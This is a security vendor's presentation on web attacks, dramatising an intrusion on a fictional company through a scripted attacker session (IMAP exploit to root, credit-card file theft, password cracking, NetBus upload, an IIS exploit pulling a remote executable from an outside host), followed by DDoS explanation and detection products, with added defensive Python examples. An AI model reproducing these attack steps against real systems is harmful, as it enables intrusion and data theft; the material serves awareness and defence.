The Anatomy of a Web Attack
John Rezabek, Technical Product Manager
jrezabek@iss.net


Agenda

• Methods of Attacks

• The Research

• The Break In

• Re-designing Web Sites

• DDOS – The New Threat

• Minimizing Threat Management

• Q & A

Methods of Attack

• Denial of Service – SYN flood, ping of death, teardrop, etc.

• Unauthorized Access – BackOrifice, Netbus, DNS Overflow, Crack

• Pre-attack Probes – Port Scan, SATAN

• Suspicious Activity – IP Unknown Protocol

• Protocol Decodes – NetBIOS Session Request, IRC


The Research ….

bigwidget.com

Registrant:
BigWidget, Conglomerated. (BWC2-DOM)
1234 Main Street
Anytown, GA USA

Domain Name: BIGWIDGET.COM

Administrative Contact, Technical Contact, Zone Contact:
BigWidget Admin (IA338-ORG) [email protected]
Phone- 678-555-1212 Fax- 678-555-1211

Billing Contact:
BigWidget Billing (IB158-ORG) [email protected]
Phone- 678-555-1212 Fax- 678-555-1211

Record last updated on 29-Jun-98.
Record created on 30-Jun-94.
Database last updated on 13-Oct-98 06:21:01 EDT.

Domain servers in listed order:
EHECATL.BIGWIDGET 208.21.0.7
NS1.SPRINTLINK.NET 204.117.214.10
NS.COMMANDCORP.COM 130.205.70.10

The Break in ....

hacker:~$ telnet bigwidget.com 25
Trying 10.0.0.28...
Connected to bigwidget.com.
Escape character is '^]'.
Connection closed by foreign host.

hacker:~$ telnet bigwidget.com 143
Trying 10.0.0.28...
Connected to bigwidget.com.
* OK bigwidget IMAP4rev1 Service 9.0(157) at Wed, 14 Oct 1998 11:51:50 -0400 (EDT) (Report problems in this server to [email protected])
. logout
* BYE bigwidget IMAP4rev1 server terminating connection
. OK LOGOUT completed
Connection closed by foreign host.

imap

imapd

hacker:~$ ./imap_exploit bigwidget.com
IMAP Exploit for Linux.
Author: Akylonius ([email protected])
Modifications: p1 ([email protected])
Completed successfully.

hacker:~$ telnet bigwidget.com
Trying 10.0.0.28...
Connected to bigwidget.com.
Red Hat Linux release 4.2 (Biltmore)
Kernel 2.0.35 on an i686
root

bigwidget:~# whoami
root
bigwidget:~# cd /etc
bigwidget:~# cat ./hosts
127.0.0.1   localhost localhost.localdomain
208.21.2.10 thevault   accounting
208.21.2.11 fasttalk   sales
208.21.2.12 geekspeak  engineering
208.21.2.13 people     human resources
208.21.2.14 thelinks   marketing
208.21.2.15 thesource  web server
bigwidget:~# rlogin thevault
login:

thevault:~# cd /data/creditcards
thevault:~# cat visa.txt
Allan B. Smith    6543-2223-1209-4002 12/99
Donna D. Smith    6543-4133-0632-4572 06/00
Jim Smith         6543-2344-1523-5522 01/01
Joseph L. Smith   6543-2356-1882-7532 04/02
Kay L. Smith      6543-2398-1972-4532 06/03
Mary Ann Smith    6543-8933-1332-4222 05/01
Robert F. Smith   6543-0133-5232-3332 05/00
thevault:~#

thevault:~# crack /etc/passwd
Cracking /etc/passwd...
username: bobman  password: nambob
username: mary    password: mary
username: root    password: ncc1701

thevault:~# ftp thesource
Name: administrator
331 Password required for administrator.
Password: *******
230 User administrator logged in.
Remote system type is Windows_NT.
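The Crack output above recovers passwords that are the username, the username reversed, and a well-known catchphrase. As an added example (not part of the presentation or of any ISS product), the following password-acceptance check rejects exactly those weaknesses before a password reaches /etc/passwd; the rules, the short denylist and the sample accounts are assumptions made for illustration.

```python
"""Password-acceptance check for the weaknesses the Crack output shows.

Added example, not part of the presentation. The rules, the tiny denylist
and the sample accounts are constructed for illustration.
"""
import re

# Constructed denylist; a real deployment loads a large wordlist instead.
COMMON_PASSWORDS = {"password", "ncc1701", "letmein", "qwerty", "12345678"}

# Digit-for-letter substitutions to undo before the denylist lookup.
_LEET = str.maketrans("013457", "oleast")


def normalise(password):
    """Lower-case and undo common leet substitutions (P4ssw0rd -> password)."""
    return password.lower().translate(_LEET)


def character_classes(password):
    """Count how many of lower, upper, digit and symbol classes are present."""
    return sum(bool(re.search(pattern, password))
               for pattern in (r"[a-z]", r"[A-Z]", r"[0-9]", r"[^A-Za-z0-9]"))


def password_problems(username, password, min_length=8):
    """Return the policy rules a candidate password violates (empty = accepted)."""
    problems = []
    user = username.lower()
    pw = password.lower()

    if len(password) < min_length:
        problems.append("shorter than %d characters" % min_length)

    # The three accounts in the demo fall to exactly these username rules.
    if pw == user:
        problems.append("equals the username")
    elif pw == user[::-1]:
        problems.append("is the username reversed")
    elif len(user) >= 3 and (user in pw or user[::-1] in pw):
        problems.append("contains the username")

    if pw in COMMON_PASSWORDS or normalise(password) in COMMON_PASSWORDS:
        problems.append("in the common-password list")

    if character_classes(password) < 3:
        problems.append("uses fewer than three character classes")

    return problems


def audit(accounts):
    """Map each (username, password) pair to its list of problems."""
    return {user: password_problems(user, pw) for user, pw in accounts}


# Constructed sample: the three recovered demo accounts plus one acceptable one.
SAMPLE_ACCOUNTS = [
    ("bobman", "nambob"),
    ("mary", "mary"),
    ("root", "ncc1701"),
    ("alice", "Tr0ub4dor&3x"),
]

if __name__ == "__main__":
    for user, problems in audit(SAMPLE_ACCOUNTS).items():
        print(user, "->", "; ".join(problems) if problems else "accepted")
```

The username rules are checked before the denylist because they catch the demo's two weakest accounts regardless of wordlist coverage; the denylist lookup runs on both the raw and the de-leeted form so that a digit substitution does not slip a common word past it.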


ftp> cd \temp
250 CWD command successful.
ftp> send netbus.exe
local: netbus.exe remote: netbus.exe
200 PORT command successful.
150 Opening BINARY mode data connection for netbus.exe
226 Transfer complete.
ftp> quit

thevault:~$ telnet thesource
Trying 208.21.2.160...
Connected to thesource.bigwidget.com.
Escape character is '^]'.

Microsoft (R) Windows NT (TM) Version 4.00 (Build 1381)
Welcome to MS Telnet Service
Telnet Server Build 5.00.98217.1
login: administrator
password: *******

*===============================================================
Welcome to Microsoft Telnet Server.
*===============================================================
C:\> cd \temp
C:\TEMP> netbus.exe

NetBus

Connected to the.source.bigwidget.com
NetBus 1.6, by cf
Screendump

David Smith <[email protected]>
[email protected]
My Raise <URGENT>

Dear Mr. Smith

I would like to thank you for the huge raise that you have seen fit to give me. With my new salary of $350,000.00 a year I am sure I am the highest paid mail clerk in the company. This really makes me feel good because I deserve it.

Your Son,
Dave
David Smith

Anatomy of the Attack – BigWidget’s Network (network diagram; only its labels survive)
Nodes: Router, UNIX Firewall, E-Mail Server, Web Server, Clients & Workstations, Network
Platform labels: UNIX, NT, UNIX
Attack tools labelled: imap, Crack, NetBus

Re-designing Web Sites: “Using a simple exploit”

hacker:~$ iishack www.bigwidget.com 80 www.hackbox.sk/ncx.exe
Data sent !

hacker:~$ telnet bigwidget.com 80
Trying 10.0.0.28...
Connected to bigwidget.com.
Microsoft (R) Windows NT (TM)
(C) Copyright 1985-1996 Microsoft Corp.

C:\> [You have full access to the system, happy browsing :)]
C:\> [Add a scheduled task to restart inetinfo in X minutes]
C:\> [Add a scheduled task to delete ncx.exe in X-1 minutes]
C:\> [Clean up any trace or logs we might have left behind]
C:\> exit
C:\>

Re-designing Web Sites: “Using a free Sniffer”

c:\> ftp webcentral
Connected to webcentral
220 webcentral Microsoft FTP Service (Version 4.0).
Name: jsmith
331 Password required for jsmith.
Password: *******
230 User jsmith logged in.
Remote system type is Windows_NT.
ftp> dir
200 PORT command successful.
150 Opening ASCII mode data connection for /bin/ls.
total 10
-rwxr-xr-x 9 jsmith jsmith  1024 Aug 17 17:07 .
-rwxr-xr-x 9 root   root    1024 Aug 17 17:07 ..
-rwxr-xr-x 2 jsmith jsmith  2034 Aug 17 17:07 index.html
-rwxr-xr-x 2 jsmith jsmith  1244 Aug 17 17:07 image1.gif
-rwxr-xr-x 2 jsmith jsmith 10244 Aug 17 17:07 image2.gif
-rwxr-x--x 6 jsmith jsmith   877 Aug 17 17:07 title.gif
-rwxr-xr-x 2 jsmith jsmith  1314 Aug 17 17:07 bigwidget.jpg
-rwxr-xr-x 2 jsmith jsmith  1824 Aug 17 17:07 page2.html
226 Transfer complete. bytes received in 0.82 seconds (0.76 Kbytes/sec)
ftp> send index.html
local: bigwedgie.html remote: index.html
200 PORT command successful.
150 Opening BINARY mode data connection for index.html
226 Transfer complete.
ftp> quit
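A defacement such as the index.html upload above is caught quickly by a web-root integrity baseline. The following is an added example, not from the presentation or from ISS: it snapshots the SHA-256 digest of every file under a directory and reports what was modified, added or removed on the next run; the directory layout and file contents in demo() are constructed.

```python
"""Web-root integrity baseline for catching a defacement like the index.html
swap in the FTP session. Added example, not from the presentation; the
directory layout and file contents in demo() are constructed."""
import hashlib
import os
import tempfile


def hash_file(path):
    """SHA-256 of a file, read in chunks so large images do not load into memory."""
    digest = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            digest.update(chunk)
    return digest.hexdigest()


def baseline(root):
    """Map every file under root (relative POSIX path) to its SHA-256."""
    snapshot = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            snapshot[rel] = hash_file(full)
    return snapshot


def compare(root, known_good):
    """Diff the current tree against a stored baseline.

    Returns sorted lists of modified, added and removed relative paths; a
    defacement shows up as 'modified' (index.html rewritten) or 'added'
    (a dropped file), never silently."""
    current = baseline(root)
    modified = [p for p in current if p in known_good and current[p] != known_good[p]]
    added = [p for p in current if p not in known_good]
    removed = [p for p in known_good if p not in current]
    return {"modified": sorted(modified), "added": sorted(added), "removed": sorted(removed)}


def _write(root, rel, data):
    """Create a file (and any parent directory) inside the constructed web root."""
    path = os.path.join(root, rel)
    os.makedirs(os.path.dirname(path), exist_ok=True)
    with open(path, "wb") as fh:
        fh.write(data)


def demo():
    """Build a constructed web root, baseline it, then simulate a defacement."""
    with tempfile.TemporaryDirectory() as root:
        _write(root, "index.html", b"<html><title>BigWidget</title></html>")
        _write(root, "page2.html", b"<html>products</html>")
        _write(root, "images/title.gif", b"GIF89a...")
        known_good = baseline(root)
        clean = compare(root, known_good)  # nothing has changed yet

        # Simulated defacement: index.html replaced, an extra file dropped,
        # one legitimate page deleted.
        _write(root, "index.html", b"<html>BigWedgie was here</html>")
        _write(root, "dropped.html", b"<html>...</html>")
        os.remove(os.path.join(root, "page2.html"))
        defaced = compare(root, known_good)
    return clean, defaced


if __name__ == "__main__":
    before, after = demo()
    print("before:", before)
    print("after :", after)
```

In practice the baseline is stored off the web server (or signed), since an intruder with the FTP account of the site owner can rewrite a baseline kept beside the content as easily as the content itself.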


Real World Website Defacements


New York Times


Distributed Denial of Service
“The New Threat”

What is a DDoS Attack?

• In a Denial of Service (DoS) attack,
– The attacker overwhelms a targeted system with a flood of packets to deny availability of services to legitimate users

• In a Distributed Denial of Service (DDoS) attack,
– The attacker uses dozens or even hundreds of ‘zombie’ machines to multiply the force of the attack
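The distinction between the two definitions above matters to detection: a DoS from one source trips a per-source rate threshold, while a DDoS spreads the load over so many zombies that no single source looks unusual and only the aggregate rate gives it away. The following added example (not from the presentation) runs both checks over constructed SYN log lines; the log format, the thresholds and the addresses are assumptions.

```python
"""Per-second flood detection that separates the DoS case (one loud source)
from the DDoS case (many zombies, each individually quiet). Added example,
not from the presentation; the log format, thresholds and sample traffic are
constructed."""
from collections import Counter, defaultdict


# Constructed log format: "<seconds> <src_ip> -> <dst_ip>:<port> <flags>"
def parse_line(line):
    """Return (second, source) for one log line, or None if it is not a SYN."""
    parts = line.split()
    if len(parts) != 5 or parts[4] != "SYN":
        return None
    return int(float(parts[0])), parts[1]


def detect(lines, per_source=50, aggregate=200):
    """Scan the log and return one alert per offending second.

    per_source: SYNs/s above which a single address is flooding (DoS).
    aggregate:  SYNs/s above which the total is a flood even when no single
                source crosses per_source (the DDoS signature).
    """
    buckets = defaultdict(Counter)
    for line in lines:
        parsed = parse_line(line)
        if parsed:
            second, src = parsed
            buckets[second][src] += 1

    alerts = []
    for second in sorted(buckets):
        counts = buckets[second]
        total = sum(counts.values())
        loud = sorted(src for src, n in counts.items() if n > per_source)
        if loud:
            alerts.append((second, "single-source flood",
                           "%d SYN/s, offending source(s): %s" % (total, ", ".join(loud))))
        elif total > aggregate:
            alerts.append((second, "distributed flood",
                           "%d SYN/s from %d sources, max %d each"
                           % (total, len(counts), max(counts.values()))))
    return alerts


def make_sample():
    """Three seconds of constructed traffic: normal, single-source DoS, DDoS."""
    lines = []
    # second 0: five workstations, six connections each (normal load)
    for i in range(5):
        for _ in range(6):
            lines.append("0.0 192.0.2.%d -> 203.0.113.10:80 SYN" % (i + 1))
    # second 1: one host sends 500 SYNs (classic DoS)
    for _ in range(500):
        lines.append("1.0 198.51.100.7 -> 203.0.113.10:80 SYN")
    # second 2: 100 zombies send 3 SYNs each, every one below per_source (DDoS)
    for z in range(100):
        for _ in range(3):
            lines.append("2.0 10.0.%d.1 -> 203.0.113.10:80 SYN" % z)
    # a non-SYN line that the parser must ignore
    lines.append("2.5 192.0.2.1 -> 203.0.113.10:80 ACK")
    return lines


if __name__ == "__main__":
    for second, kind, detail in detect(make_sample()):
        print("t=%d %s: %s" % (second, kind, detail))
```

The per-source rule fires at second 1 and the aggregate rule at second 2; lowering per_source until the zombies trip it would also flag the five legitimate workstations, which is exactly why the distributed form needs the second threshold.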


Motives Behind DDoS Attacks

• Recent attacks appear to be motivated by:
– Desire for attention
– Notoriety
– Fun

• Long term, DDoS type attacks could become motivated by:
– Economic warfare between competitors
– Disgruntled employees / customers
– Monetary gains (e.g. stock manipulation)
– Political sabotage and vandalism

Types of DDoS Attacks

• TFN (Tribal Flood Network)
• Trin00
• TFN2K (Tribal Flood Network 2K)
• Stacheldraht (Barbed Wire)
• NEW attack tools - Announced 2/15/00
– Fapi
– Shaft
– Trank

DDoS Components

• All DDoS attacks consist of three parts:
– Client Program
– Master Server
– Agent (Zombie) Program

DDoS Attack Illustrated (six diagram slides; the numbered captions are what survives)

Step 1 – Hacker scans Internet for unsecured systems that can be compromised (labels: Hacker, Scanning Program, Unsecured Computers, Internet)

Step 2 – Hacker secretly installs zombie agent programs, turning unsecured computers into zombies (labels: Hacker, Zombies, Internet)

Step 3 – Hacker selects a Master Server to send commands to the zombies (labels: Hacker, Master Server, Zombies, Internet)

Step 4 – Using Client program, Hacker sends commands to Master Server to launch zombie attack against a targeted system (labels: Hacker, Master Server, Zombies, Targeted System, Internet)

Step 5 – Master Server sends signal to zombies to launch attack on targeted system (labels: Hacker, Master Server, Zombies, Targeted System, Internet)

Step 6 – Targeted system is overwhelmed by bogus requests that shut it down for legitimate users (labels: Hacker, Master Server, Zombies, Targeted System, User, Request Denied, Internet)

Enterprise Risk Management

Enterprise Security Management (diagram)
Monitored: Operating Systems, Applications, Databases, Networks
Detected: Policy Violations, Vulnerabilities, Threats
Produced: Alarms, Corrective action, Active response, Actionable Information

Vulnerability Management – corrective action report

Vulnerability: GetAdmin
Severity: High Risk
IP Address: 215.011.200.255
OS: Windows NT 4.0
Fix: From the Start menu, choose Programs/Administrative Tools/User Manager. Under Policies/User Rights, check the users who have admin privileges on that host. Stronger action may be needed, such as reinstalling the operating system from CD. Consider this host compromised, as well as any passwords from any other users on this host. In addition, apply the post-SP3 getadmin patch, or SP4 when available. Also refer to Microsoft Knowledge Base Article Q146965.txt.

Vulnerability Management

• Continued compliance to policy

• Unauthorized system changes

• New vulnerabilities

• Suspicious activity

• General ‘good practice’


Threat Management (response flow diagram)
ATTACK DETECTED → EMAIL ALERT / LOG → RECORD SESSION → SESSION TERMINATED → RECONFIGURE FIREWALL / ROUTER
INTERNAL ATTACK DETECTED → SESSION LOGGED

Threat Management

• Known network attacks

• Continued compliance to policy

• Unauthorized access

• Suspicious network activity

• General ‘good practice’
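The response flow on the Threat Management diagram (email alert and log, record session, terminate session, reconfigure firewall or router for an external attack; session logged for an internal one) can be expressed as a small policy engine. The following is an added example, not ISS code: the network ranges, the never-block allowlist, the event fields and the sample events are constructed assumptions. The allowlist and the already-blocked check are there so that an automated response cannot be turned against the site's own monitoring hosts or flood the firewall with duplicate rules.

```python
"""Response-policy engine following the Threat Management flow:
external attack -> log, email alert, record session, terminate session,
reconfigure firewall/router; internal attack -> session logged.
Added example, not from the presentation; the networks, the allowlist, the
event fields and the sample events are constructed."""
import ipaddress

# Constructed site configuration (assumption: RFC 1918 space is "internal").
INTERNAL_NETS = [ipaddress.ip_network("10.0.0.0/8"),
                 ipaddress.ip_network("192.168.0.0/16")]
# Addresses that must never be auto-blocked (assumption: the IDS console and a
# managed scanning service); blocking these would be a self-inflicted outage.
NEVER_BLOCK = {"10.0.0.5", "203.0.113.250"}
BLOCK_SECONDS = 3600


def is_internal(ip):
    """True when the address falls inside one of the site's internal ranges."""
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in INTERNAL_NETS)


def plan_response(event, blocked=None):
    """Return the ordered list of actions for one detection event.

    event:   dict with 'src', 'dst', 'signature' and 'session_id'.
    blocked: set of sources already blocked in this run; prevents re-issuing
             a firewall change for every packet of the same attack."""
    blocked = set() if blocked is None else blocked
    src = event["src"]
    actions = ["log:%s from %s" % (event["signature"], src)]

    if is_internal(src):
        # The diagram's internal path: the session is logged, no automated block.
        actions.append("session_logged:%s" % event["session_id"])
        return actions

    # External path: alert, keep the evidence, cut the session, then block.
    actions += ["email_alert:%s from %s" % (event["signature"], src),
                "record_session:%s" % event["session_id"],
                "terminate_session:%s" % event["session_id"]]
    if src in NEVER_BLOCK:
        actions.append("skip_block:%s is on the never-block list" % src)
    elif src in blocked:
        actions.append("skip_block:%s already blocked" % src)
    else:
        blocked.add(src)
        actions.append("reconfigure_firewall:drop %s for %ds" % (src, BLOCK_SECONDS))
    return actions


def run(events):
    """Plan responses for a sequence of events, sharing one block list."""
    blocked = set()
    return [plan_response(e, blocked) for e in events]


# Constructed sample events echoing the demo: an IMAP overflow from outside,
# repeated; an internal rlogin to the accounting host; a hit from the scanner.
SAMPLE_EVENTS = [
    {"src": "198.51.100.7", "dst": "203.0.113.10",
     "signature": "IMAP buffer overflow", "session_id": "s1"},
    {"src": "198.51.100.7", "dst": "203.0.113.10",
     "signature": "IMAP buffer overflow", "session_id": "s2"},
    {"src": "10.1.2.3", "dst": "10.0.0.9",
     "signature": "rlogin to accounting host", "session_id": "s3"},
    {"src": "203.0.113.250", "dst": "203.0.113.10",
     "signature": "port scan", "session_id": "s4"},
]

if __name__ == "__main__":
    for event, actions in zip(SAMPLE_EVENTS, run(SAMPLE_EVENTS)):
        print(event["src"], "->", actions)
```

Recording the session before terminating it matches the order on the diagram and preserves the forensic data the later "Minimizing Risk" slide asks for; the block carries an expiry so that a spoofed source address cannot lock a legitimate peer out indefinitely.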


Information Risk Management – Enterprise Security Risk Profile (diagram)
Inputs: Vulnerability Data, Threat Data, Firewall/Router Logs, PKI/Authentication Data
Plotted over Time: Internal Threats, Vulnerabilities, External Threats

Business Is Changing

Source: Forrester Research, Inc.

Yesterday:
• Internal Focus – Access is granted to employees only
• Centralized Assets – Applications and data are centralized in fortified IT bunkers
• Prevent Losses – The goal of security is to protect against confidentiality breaches
• IT Control – Security manager decides who gets access

Today:
• External Focus – Suppliers, customers, and prospects all need some form of access
• Distributed Assets – Applications and data are distributed across servers, locations, and business units
• Generate Revenue – The goal of security is to enable eCommerce
• Business Control – Business units want the authority to grant access

Minimizing Risk

• Prevent yourself from being victimized
– Ensure your computers are not zombies
– Perform periodic assessments via automated scanning services

• Implement an early warning system
– Automated Intrusion Detection & Response tools
– Collect forensic data to prosecute hackers later

Additional Resources

• Secure e-Business White Paper: http://solutions.iss.net/products/whitepapers/securityebus.pdf

• What to do if you are attacked: http://www.iss.net/news/denial.php

• Technical information about DDoS attacks: http://xforce.iss.net/alerts/advise43.php3

• X-Force Security Risk Database: http://xforce.iss.net

• ISS Download Center: http://www.iss.net/eval/eval.php

• ISS White Papers: http://solutions.iss.net/products/whitepapers

Questions & Answers?

Thank you for your time; for more information see www.iss.net

Thank You